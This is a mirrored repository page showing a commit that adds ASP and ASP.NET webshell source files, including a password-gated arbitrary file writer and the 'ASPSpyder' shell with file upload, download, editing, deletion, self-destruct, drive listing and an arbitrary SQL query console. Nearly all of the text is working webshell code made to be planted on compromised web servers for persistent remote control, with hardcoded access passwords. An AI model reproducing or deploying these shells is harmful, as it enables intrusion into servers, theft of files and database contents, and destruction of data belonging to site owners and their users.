Mirrors/webshell
2
0
Fork 0
mirror of https://github.com/tennc/webshell synced 2024-11-10 05:44:11 +00:00
Code Issues Projects Releases Packages Wiki Activity

add asp webshell

Browse source
This commit is contained in:
tennc 2014-05-22 11:15:41 +08:00
parent 8837894df0
commit 0119015514
10 changed files with 6771 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

57
asp/08小组内部交流专用.asp.txt Normal file
View file

@ -0,0 +1,57 @@
<%@ Page Language="C#" AutoEventWireup="true" validateRequest="false"%>
<html>
<head runat="server">
<title>08小组内部交流专用 www.huc08.com</title>
<style type="text/css">
.btn{
background-color:transparent;
color:#00FF00;
border:1px solid #00FF00;
font-size:12px;
font-weight:bold;
}
</style>
<script language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
this.lblthispath.Text = Server.MapPath(Request.ServerVariables["PATH_INFO"]);
}
void btnUpload_Click(object sender, EventArgs e)
{
string password = "TNTHK";
if (password.Equals(this.txtPass.Text))
{
System.IO.StreamWriter sw = new System.IO.StreamWriter(this.txtPath.Text,true,System.Text.Encoding.GetEncoding("gb2312"));
sw.Write(this.txtContext.Text);
sw.Flush();
sw.Close();
Response.Write("上传成功!");
}
else
{
Response.Write("擦!哥的马子你也敢泡!");
}
}
</script>
</head>
<body style="font-size:12px;font-weight:bold;color:#00FF00;font-family:Arial, Helvetica, sans-serif;background-color:#000000;">
<form id="form1" runat="server">
<div>
本文件路径:<asp:Label runat="server" ID="lblthispath" Text=""></asp:Label>
<br />
<br />
上传的口令:<asp:TextBox runat="server" ID="txtPass" Width="400px"></asp:TextBox>
<br />
<br />
上传的路径:<asp:TextBox runat="server" ID="txtPath" Width="400px" ></asp:TextBox>
<br />
<br />
上传的内容:<asp:TextBox runat="server" ID="txtContext" Width="400px" Height="250px" TextMode="MultiLine"></asp:TextBox>
<br />
<br />
<br />
<asp:Button runat="server" ID="btnUpload" text="上传" CssClass="btn" OnClick="btnUpload_Click"/>
</div>
</form>
</body>
</html>

1870
asp/80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一asp.txt Normal file
View file

File diff suppressed because it is too large Load diff

827
asp/aspydrv.asp.txt Normal file
View file

@ -0,0 +1,827 @@
<%
Function BufferContent(data)
Dim strContent(64)
Dim i
ClearString strContent
For i = 1 To LenB(data)
AddString strContent,Chr(AscB(MidB(data,i,1)))
Next
BufferContent = fnReadString(strContent)
End Function
Sub ClearString(part)
Dim index
For index = 0 to 64
part(index)=""
Next
End Sub
Sub AddString(part,newString)
Dim tmp
Dim index
part(0) = part(0) & newString
If Len(part(0)) > 64 Then
index=0
tmp=""
Do
tmp=part(index) & tmp
part(index) = ""
index = index + 1
Loop until part(index) = ""
part(index) = tmp
End If
End Sub
Function fnReadString(part)
Dim tmp
Dim index
tmp = ""
For index = 0 to 64
If part(index) <> "" Then
tmp = part(index) & tmp
End If
Next
FnReadString = tmp
End Function
Class FileUploader
Public Files
Private mcolFormElem
Private Sub Class_Initialize()
Set Files = Server.CreateObject("Scripting.Dictionary")
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
End Sub
Private Sub Class_Terminate()
If IsObject(Files) Then
Files.RemoveAll()
Set Files = Nothing
End If
If IsObject(mcolFormElem) Then
mcolFormElem.RemoveAll()
Set mcolFormElem = Nothing
End If
End Sub
Public Property Get Form(sIndex)
Form = ""
If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
End Property
Public Default Sub Upload()
Dim biData, sInputName
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
Dim nPosFile, nPosBound
biData = Request.BinaryRead(Request.TotalBytes)
nPosBegin = 1
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
nDataBoundPos = InstrB(1, biData, vDataBounds)
Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
nPos = InstrB(nPos, biData, CByteString("name="))
nPosBegin = nPos + 6
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
nPosBound = InstrB(nPosEnd, biData, vDataBounds)
If nPosFile <> 0 And nPosFile < nPosBound Then
Dim oUploadFile, sFileName
Set oUploadFile = New UploadedFile
nPosBegin = nPosFile + 10
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
nPosBegin = nPos + 14
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosBegin = nPosEnd+4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
Else
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
nPosBegin = nPos + 4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
End If
nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
Loop
End Sub
'String to byte string conversion
Private Function CByteString(sString)
Dim nIndex
For nIndex = 1 to Len(sString)
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
Next
End Function
'Byte string to string conversion
Private Function CWideString(bsString)
Dim nIndex
CWideString =""
For nIndex = 1 to LenB(bsString)
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
Next
End Function
End Class
Class UploadedFile
Public ContentType
Public FileName
Public FileData
Public Property Get FileSize()
FileSize = LenB(FileData)
End Property
Public Sub SaveToDisk(sPath)
Dim oFS, oFile
Dim nIndex
If sPath = "" Or FileName = "" Then Exit Sub
If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
Set oFS = Server.CreateObject("Scripting.FileSystemObject")
If Not oFS.FolderExists(sPath) Then Exit Sub
Set oFile = oFS.CreateTextFile(sPath & FileName, True)
' output mechanism modified for buffering
oFile.Write BufferContent(FileData)
oFile.Close
End Sub
Public Sub SaveToDatabase(ByRef oField)
If LenB(FileData) = 0 Then Exit Sub
If IsObject(oField) Then
oField.AppendChunk FileData
End If
End Sub
End Class
' Create the FileUploader
IF REQUEST.QueryString("upload")="@" THEN
Dim Uploader, File
Set Uploader = New FileUploader
' This starts the upload process
Uploader.Upload()
%>
<html><title>ASPYDrvsInfo</title>
<style>
<!--
A:link {font-style: text-decoration: none; color: #c8c8c8}
A:visited {font-style: text-decoration: none; color: #777777}
A:active {font-style: text-decoration: none; color: #ff8300}
A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
* {scrollbar-base-color:#777777;
scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
//-->
</style>
<body bgcolor=black text=white>
<BR><BR><BR>
<center><table bgcolor="#505050" cellpadding=4>
<tr><td><Font face=arial size=-1>File upload Information:</font>
</td></tr><tr><td bgcolor=black ><table>
<%
' Check if any files were uploaded
If Uploader.Files.Count = 0 Then
Response.Write "File(s) not uploaded."
Else
' Loop through the uploaded files
For Each File In Uploader.Files.Items
File.SaveToDisk Request.QueryString("txtpath")
Response.Write "<TR><TD>&nbsp;</TD></TR><tr><td><font color=gray>File Uploaded: </font></td><td>" & File.FileName & "</td></tr>"
Response.Write "<tr><td><font color=gray>Size: </font></td><td>" & Int(File.FileSize/1024)+1 & " kb</td></tr>"
Response.Write "<tr><td><font color=gray>Type: </font></td><td>" & File.ContentType & "</td></tr>"
Next
End If
%>
<TR><TD>&nbsp;</TD></TR></table>
</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=Request.QueryString("txtpath")%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
<%
response.End() '---- XXX
END IF
'--------
ON ERROR RESUME NEXT
Response.Buffer = True
password = "t00ls.org" ' <---Your password here
If request.querystring("logoff")="@" then
session("shagman")="" ' Logged off
session("dbcon")="" ' Database Connection
session("txtpath")="" ' any pathinfo
end if
If (session("shagman")<>password) and Request.form("code")="" Then
%>
<body bgcolor=black><center><BR><BR><BR><BR><FONT face=arial size=-2 color=#ff8300>ADMINSTRATORS TOOLKIT</FONT><BR><BR><BR>
<table><tr><td>
<FORM method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" >
<table bgcolor=#505050 width="20%" cellpadding=20 ><tr><td bgcolor=#303030 align=center >
<INPUT type=password name=code ></td><td><INPUT name=submit type=submit value=" Access ">
</td></tr></table>
</td></tr><tr><td align=right>
<font color=white size=-2 face=arial >ASPSpyder Apr2003</font></td></tr>
</td></tr></table></FORM>
<%If request.querystring("logoff")="@" then%>
<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
<%end if%>
<center>
<%
Response.END
End If
If Request.form("code") = password or session("shagman") = password Then
session("shagman") = password
Else
Response.Write "<BR><B><P align=center><font color=red ><b>ACCESS DENIED</B></font><BR><font color=Gray >Copyright 2003 Vela iNC.</font></p>"
Response.END
End If
server.scriptTimeout=180
set fso = Server.CreateObject("Scripting.FileSystemObject")
mapPath = Server.mappath(Request.Servervariables("SCRIPT_NAME"))
mapPathLen = len(mapPath)
if session(myScriptName) = "" then
for x = mapPathLen to 0 step -1
myScriptName = mid(mapPath,x)
if instr(1,myScriptName,"\")>0 then
myScriptName = mid(mapPath,x+1)
x=0
session(myScriptName) = myScriptName
end if
next
Else
myScriptName = session(myScriptName)
end if
wwwRoot = left(mapPath, mapPathLen - len(myScriptName))
Target = "D:\hshome\masterhr\masterhr.com\" ' ---Directory to which files will be DUMPED Too and From
if len(Request.querystring("txtpath"))=3 then
pathname = left(Request.querystring("txtpath"),2) & "\" & Request.form("Fname")
else
pathname = Request.querystring("txtpath") & "\" & Request.form("Fname")
end if
If Request.Form("txtpath") = "" Then
MyPath = Request.QueryString("txtpath")
Else
MyPath = Request.Form("txtpath")
End If
' ---Path correction routine
If len(MyPath)=1 then MyPath=MyPath & ":\"
If len(MyPath)=2 then MyPath=MyPath & "\"
If MyPath = "" Then MyPath = wwwRoot
If not fso.FolderExists(MyPath) then
Response.Write "<font face=arial size=+2>Non-existing path specified.<BR>Please use browser back button to continue !"
Response.end
end if
set folder = fso.GetFolder(MyPath)
if fso.GetFolder(Target) = false then
Response.Write "<font face=arial size=-2 color=red>Please create your target directory for copying files as it does not exist. </font><font face=arial size=-1 color=red>" & Target & "<BR></font>"
else
set fileCopy = fso.GetFolder(Target)
end if
If Not(folder.IsRootFolder) Then
If len(folder.ParentFolder)>3 then
showPath = folder.ParentFolder & "\" & folder.name
Else
showPath = folder.ParentFolder & folder.name
End If
Else
showPath = left(MyPath,2)
End If
MyPath=showPath
showPath=MyPath & "\"
' ---Path correction routine-DONE
set drv=fso.GetDrive(left(MyPath,2))
if Request.Form("cmd")="Download" then
if Request.Form("Fname")<>"" then
Response.Buffer = True
Response.Clear
strFileName = Request.QueryString("txtpath") & "\" & Request.Form("Fname")
Set Sys = Server.CreateObject( "Scripting.FileSystemObject" )
Set Bin = Sys.OpenTextFile( strFileName, 1, False )
Call Response.AddHeader( "Content-Disposition", "attachment; filename=" & Request.Form("Fname") )
Response.ContentType = "application/octet-stream"
While Not Bin.AtEndOfStream
Response.BinaryWrite( ChrB( Asc( Bin.Read( 1 ) ) ) )
Wend
Bin.Close : Set Bin = Nothing
Set Sys = Nothing
Else
err.number=500
err.description="Nothing selected for download..."
End if
End if
%>
<html>
<style>
<!--
A:link {font-style: text-decoration: none; color: #c8c8c8}
A:visited {font-style: text-decoration: none; color: #777777}
A:active {font-style: text-decoration: none; color: #ff8300}
A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
* {scrollbar-base-color:#777777;
scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
//-->
</style>
<%
'QUERY ANALYSER -- START
if request.QueryString("qa")="@" then
'-------------
sub getTable(mySQL)
if mySQL="" then
exit sub
end if
on error resume next
Response.Buffer = True
Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
myConnectionString=session("dbCon")
Set myDBConnection = Server.CreateObject("ADODB.Connection")
myDBConnection.Open myConnectionString
myFlag = False
myFlag = errChk()
set rs = Server.CreateObject("ADODB.Recordset")
rs.cursorlocation = 3
rs.open mySQL, myDBConnection
myFlag = errChk()
if RS.properties("Asynchronous Rowset Processing") = 16 then
For i = 0 To rs.Fields.Count - 1
myFields = myFields & "<TD><font color=#eeeeee size=2 face=""Verdana, Arial, Helvetica, sans-serif"">" & rs.Fields(i).Name & "</font></TD>"
Next
myTitle = "<font color=gray size=6 face=webdings>?</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(" & rs.RecordCount & " row(s) affected)</TT><br>"
rs.MoveFirst
rs.PageSize=mNR
if int(rs.RecordCount/mNR) < mPage then mPage=1
rs.AbsolutePage = mPage
Response.Write myTitle & "</td><td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"
if mPage=1 Then Response.Write("<input type=button name=btnPagePrev value="" << "" DISABLED>") else Response.Write("<input type=button name=btnPagePrev value="" << "">")
Response.Write "<select name=cmbPageSelect>"
For x = 1 to rs.PageCount
if x=mPage Then Response.Write("<option value=" & x & " SELECTED>" & x & "</option>") else Response.Write("<option value=" & x & ">" & x & "</option>")
Next
Response.Write "</select><input type=hidden name=mPage value=" & mPage & ">"
if mPage = rs.PageCount Then Response.Write("<input type=button name=btnPageNext value="" >> "" DISABLED>") else Response.Write("<input type=button name=btnPageNext value="" >> "">")
Response.Write "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray>Displaying <input type=text size=" & Len(mNR) & " name=txtNoRecords value=" & mNR & "> records at a time.</font>"
response.Write "</td><TABLE border=0 bgcolor=#999999 cellpadding=2><TR align=center valign=middle bgcolor=#777777>" & myFields
For x = 1 to rs.PageSize
If Not rs.EOF Then
response.Write "<TR>"
For i = 0 to rs.Fields.Count - 1
response.Write "<TD bgcolor=#dddddd>" & server.HTMLEncode(rs(i)) & "</TD>"
Next
response.Write "</TR>"
response.Flush()
rs.MoveNext
Else
x=rs.PageSize
End If
Next
response.Write "</Table>"
myFlag = errChk()
else
if not myFlag then
myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
response.Write myTitle
end if
end if
set myDBConnection = nothing
set rs2 = nothing
set rs = nothing
End sub
sub getXML(mySQL)
if mySQL="" then
exit sub
end if
on error resume next
Response.Buffer = True
Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
myConnectionString=session("dbCon")
Set myDBConnection = Server.CreateObject("ADODB.Connection")
myDBConnection.Open myConnectionString
myFlag = False
myFlag = errChk()
set rs = Server.CreateObject("ADODB.Recordset")
rs.cursorlocation = 3
rs.open mySQL, myDBConnection
myFlag = errChk()
if RS.properties("Asynchronous Rowset Processing") = 16 then
Response.Write "<font color=#55ff55 size=4 face=webdings>i</font><font color=#cccccc> Copy paste this code and save as '.xml '</font></td></tr><tr><td>"
Response.Write "<textarea cols=75 name=txtXML rows=15>"
rs.MoveFirst
response.Write vbcrlf & "<?xml version=""1.0"" ?>"
response.Write vbcrlf & "<TableXML>"
Do While Not rs.EOF
response.Write vbcrlf & "<Column>"
For i = 0 to rs.Fields.Count - 1
response.Write vbcrlf & "<" & rs.Fields(i).Name & ">" & rs(i) & "</" & rs.Fields(i).Name & ">" & vbcrlf
response.Flush()
Next
response.Write "</Column>"
rs.MoveNext
Loop
response.Write "</TableXML>"
response.Write "</textarea>"
myFlag = errChk()
else
if not myFlag then
myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
response.Write myTitle
end if
end if
End sub
Function errChk()
if err.Number <> 0 and err.Number <> 13 then
dim myText
myText = "<font color=#ff8300 size=4 face=webdings>x</font><font color=red size=2 face=""Verdana, Arial, Helvetica, sans-serif""> " & err.Description & "</font><BR>"
response.Write myText
err.Number = 0
errChk = True
end if
end Function
Dim myQuery,mPage,mNR
myQuery = request.Form("txtSQL")
if request.form("txtCon") <> "" then session("dbcon") = request.form("txtCon")
if request.QueryString("txtpath") then session("txtpath")=request.QueryString("txtpath")
mPage=cint(request.Form("mPage"))
if mPage<1 then mPage=1
mNR=cint(request.Form("txtNoRecords"))
if mNR<1 then mNR=30
%>
<html><title>ASPyQAnalyser</title>
<script language="VbScript">
sub cmdSubmit_onclick
if Document.frmSQL.txtSQL.value = "" then
Document.frmSQL.txtSQL.value = "SELECT * FROM " & vbcrlf & "WHERE " & vbcrlf & "ORDER BY "
exit sub
end if
Document.frmSQL.Submit
end sub
sub cmdTables_onclick
Document.frmSQL.txtSQL.value = "select name as 'TablesListed' from sysobjects where xtype='U' order by name"
Document.frmSQL.Submit
end sub
sub cmdColumns_onclick
strTable =InputBox("Return Columns for which Table?","Table Name...")
strTable = Trim(strTable)
if len(strTable) > 0 Then
SQL = "select name As 'ColumnName',xusertype As 'DataType',length as Length from syscolumns where id=(select id from sysobjects where xtype='U' and name='" & strTable & "') order by name"
Document.frmSQL.txtSQL.value = SQL
Document.frmSQL.Submit
End if
end sub
sub cmdClear_onclick
Document.frmSQL.txtSQL.value = ""
end sub
sub cmdBack_onclick
Document.Location = "<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=session("txtpath")%>"
end sub
Sub btnPagePrev_OnClick
Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1
Document.frmSQL.Submit
end sub
Sub btnPageNext_OnClick
Document.frmSQL.mPage.value = Document.frmSQL.mPage.value + 1
Document.frmSQL.Submit
end sub
Sub cmbPageSelect_onchange
Document.frmSQL.mPage.value = (Document.frmSQL.cmbPageSelect.selectedIndex + 1)
Document.frmSQL.Submit
End Sub
Sub txtNoRecords_onclick
Document.frmSQL.cmbPageSelect.selectedIndex = 0
Document.frmSQL.mPage.value = 1
End Sub
</script>
<style>
TR {font-family: sans-serif;}
</style>
<body bgcolor=black>
<form name=frmSQL action="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@" method=Post>
<table border="0"><tr>
<td align=right><font color=#ff8300 size="4" face="webdings">@ </font><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">Paste
your connection string here : </font><font color="#CCCCCC">
<input name=txtCon type="text" size="60" value="<%=session("dbcon")%>">
</font><BR>
<textarea cols=75 name=txtSQL rows=4 wrap=PHYSICAL><%=myQuery%></textarea><BR>
<input name=cmdSubmit type=button value=Submit><input name=cmdTables type=button value=Tables><input name=cmdColumns type=button value=Columns><input name="reset" type=reset value=Reset><input name=cmdClear type=button value=Clear><input name=cmdBack type=button value="Return"><input type="Checkbox" name="chkXML" <%IF Request.Form("chkXML")= "on" tHEN Response.Write " checked " %>><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">GenerateXML</FONT>
</td>
<td>XXXXXX</td><td>
<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shagalot</TT></font></center>
</td></tr></table>
<table><tr><td><%If Request.Form("chkXML") = "on" Then getXML(myQuery) Else getTable(myQuery) %></td></tr></table></form>
<HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=-1 color=gray>Cheers to <a href="mailto:hAshish@shagzzz.cjb.net">hAshish</a> for all the help!</font></p><BR>
</body>
</html>
<%
set myDBConnection = nothing
set rs2 = nothing
set rs = nothing
'-------------
response.End()
end if
'QUERY ANALYSER -- STOP
%>
<title><%=MyPath%></title>
</head>
<body bgcolor=black text=white topAprgin="0">
<!-- Copyright Vela iNC. Apr2003 [www.shagzzz.cjb.net] Coded by ~sir_shagalot -->
<%
Response.Flush
'Code Optimisation START
select case request.form("cmd")
case ""
If request.form("dirStuff")<>"" then
Response.write "<font face=arial size=-2>You need to click [Create] or [Delete] for folder operations to be</font>"
Else
Response.Write "<font face=webdings size=+3 color=#ff8300>&#1570;</font>"
End If
case " Copy "
' ---Copy From Folder routine Start
If Request.Form("Fname")="" then
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\???</font><BR>"
err.number=424
Else
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\" & Request.Form("Fname") & "</font><BR>"
fso.CopyFile Request.QueryString("txtpath") & "\" & Request.Form("Fname"),Target & Request.Form("Fname")
Response.Flush
End If
' ---Copy From Folder routine Stop
case " Copy "
' ---Copy Too Folder routine Start
If Request.Form("ToCopy")<>"" and Request.Form("ToCopy") <> "------------------------------" Then
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\" & Request.Form("ToCopy") & "</font><BR>"
Response.Flush
fso.CopyFile Target & Request.Form("ToCopy"), Request.Form("txtpath") & "\" & Request.Form("ToCopy")
Else
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\???</font><BR>"
err.number=424
End If
' ---Copy Too Folder routine Stop
case "Delete" 'two of this
if request.form("todelete")<>"" then
' ---File Delete start
If (Request.Form("ToDelete")) = myScriptName then'(Right(Request.Servervariables("SCRIPT_NAME"),len(Request.Servervariables("SCRIPT_NAME"))-1)) Then
Response.Write "<center><font face=arial size=-2 color=#ff8300><BR><BR><HR>SELFDESTRUCT INITIATED...<BR>"
Response.Flush
fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
%>+++DONE+++</font><BR><HR>
<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
<%Response.End
End If
If Request.Form("ToDelete") <> "" and Request.Form("ToDelete") <> "------------------------------" Then
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\" & Request.Form("ToDelete") & "</font><BR>"
Response.Flush
fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
Else
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\???</font><BR>"
err.number=424
End If
' ---File Delete stop
Else If request.form("dirStuff")<>"" then
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting folder...</font><BR>"
fso.DeleteFolder MyPath & "\" & request.form("DirName")
end if
End If
case "Edit/Create"
%>
<center><BR><table bgcolor="#505050" cellpadding="8"><tr>
<td bgcolor="#000000" valign="bottom">
<Font face=arial SIZE=-2 color=#ff8300>NOTE: The following edit box maynot display special characters from files. Therefore the contents displayed maynot be considered correct or accurate.</font>
</td></tr><tr><td><TT>Path=> <%=pathname%><BR><BR>
<%
' fetch file information
Set f = fso.GetFile(pathname)
%>
file Type: <%=f.Type%><BR>
file Size: <%=FormatNumber(f.size,0)%> bytes<BR>
file Created: <%=FormatDateTime(f.datecreated,1)%>&nbsp;<%=FormatDateTime(f.datecreated,3)%><BR>
last Modified: <%=FormatDateTime(f.datelastmodified,1)%>&nbsp;<%=FormatDateTime(f.datelastmodified,3)%><BR>
last Accessed: <%=FormatDateTime(f.datelastaccessed,1)%>&nbsp;<%=FormatDateTime(f.datelastaccessed,3)%><BR>
file Attributes: <%=f.attributes%><BR>
<%
Set f = Nothing
response.write "<center><FORM action=""" & Request.Servervariables("SCRIPT_NAME") & "?txtpath=" & MyPath & """ METHOD=""POST"">"
'read the file
Set f = fso.OpenTextFile(pathname)
If NOT f.AtEndOfStream Then fstr = f.readall
f.Close
Set f = Nothing
Set fso = Nothing
response.write "<TABLE><TR><TD>" & VBCRLF
response.write "<FONT TITLE=""Use this text area to view or change the contents of this document. Click [Save As] to store the updated contents to the web server."" FACE=arial SIZE=1 ><B>DOCUMENT CONTENTS</B></FONT><BR>" & VBCRLF
response.write "<TEXTAREA NAME=FILEDATA ROWS=16 COLS=85 WRAP=OFF>" & Server.HTMLEncode(fstr) & "</TEXTAREA>" & VBCRLF
response.write "</TD></TR></TABLE>" & VBCRLF
%>
<BR><center><TT>LOCATION <INPUT TYPE="TEXT" SIZE=48 MAXLENGTH=255 NAME="PATHNAME" VALUE="<%=pathname%>">
<INPUT TYPE="SUBMIT" NAME=cmd VALUE="Save As" TITLE="This write to the file specifed and overwrite it without warning.">
<INPUT TYPE="SUBMIT" NAME="POSTACTION" VALUE="Cancel" TITLE="If you recieve an error while saving, then most likely you do not have write access OR the file attributes are set to readonly !!">
</FORM></td></tr></table><BR>
<%
response.end
case "Create"
Response.Write "<font face=arial size=-2 color=#ff8300>Creating folder...</font><BR>"
fso.CreateFolder MyPath & "\" & request.form("DirName")
case "Save As"
Response.Write "<font face=arial size=-2 color=#ff8300>Saving file...</font><BR>"
Set f = fso.CreateTextFile(Request.Form("pathname"))
f.write Request.Form("FILEDATA")
f.close
end select
'Code Optimisation STOP
' ---DRIVES start here
If request.querystring("getDRVs")="@" then
%>
<BR><BR><BR><center><table bgcolor="#505050" cellpadding=4>
<tr><td><Font face=arial size=-1>Available Drive Information:</font>
</td></tr><tr><td bgcolor=black >
<table><tr><td><tt>Drive</td><td><tt>Type</td><td><tt>Path</td><td><tt>ShareName</td><td><tt>Size[MB]</td><td><tt>ReadyToUse</td><td><tt>VolumeLabel</td><td></tr>
<%For Each thingy in fso.Drives%>
<tr><td><tt>
<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thingy.Path%> </td><td><tt> <%=thingy.ShareName%> </td><td><tt> <%=((thingy.TotalSize)/1024000)%> </td><td><tt> <%=thingy.IsReady%> </td><td><tt> <%=thingy.VolumeName%>
<%Next%>
</td></tr></table>
</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
<%
Response.end
end if
' ---DRIVES stop here
%>
<HEAD>
<SCRIPT Language="VBScript">
sub getit(thestuff)
if right("<%=showPath%>",1) <> "\" Then
document.myform.txtpath.value = "<%=showPath%>" & "\" & thestuff
Else
document.myform.txtpath.value = "<%=showPath%>" & thestuff
End If
document.myform.submit()
End sub
</SCRIPT>
</HEAD>
<%
'---Report errors
select case err.number
case "0"
response.write "<font face=webdings color=#55ff55>i</font> <font face=arial size=-2>Successfull..</font>"
case "58"
response.write "<font face=arial size=-1 color=red>Folder already exists OR no folder name specified...</font>"
case "70"
response.write "<font face=arial size=-1 color=red>Permission Denied, folder/file is readonly or contains such files...</font>"
case "76"
response.write "<font face=arial size=-1 color=red>Path not found...</font>"
case "424"
response.write "<font face=arial size=-1 color=red>Missing, Insufficient data OR file is readonly...</font>"
case else
response.write "<font face=arial size=-1 color=red>" & err.description & "</font>"
end select
'---Report errors end
%>
<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shagalot</TT></font></center>
<font face=Courier>
<table><tr><td>
<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" name="myform" >
<Table bgcolor=#505050 ><tr><td bgcolor=#505050 >
<font face=Arial size=-2 color=#ff8300 > PATH INFO : </font></td><td align=right ><font face=Arial size=-2 color=#ff8300 >Volume Label:</font> <%=drv.VolumeName%> </td></tr>
<tr><td colspan=2 cellpadding=2 bgcolor=#303030 ><font face=Arial size=-1 color=gray>Virtual: http://<%=Request.ServerVariables("SERVER_NAME")%><%=Request.Servervariables("SCRIPT_NAME")%></Font><BR><font face=wingdings color=Gray >1</font><font face=Arial size=+1 > <%=showPath%></Font>
<BR><input type=text width=40 size=60 name=txtpath value="<%=showPath%>" ><input type=submit name=cmd value=" View " >
</td></tr></form></table>
</td><td><center>
<table bgcolor=#505050 cellpadding=4><tr><td bgcolor=black ><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?getDRVs=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>Retrieve Available Network Drives</a></td></tr>
<tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>SQL Query Analyser</A></td></tr>
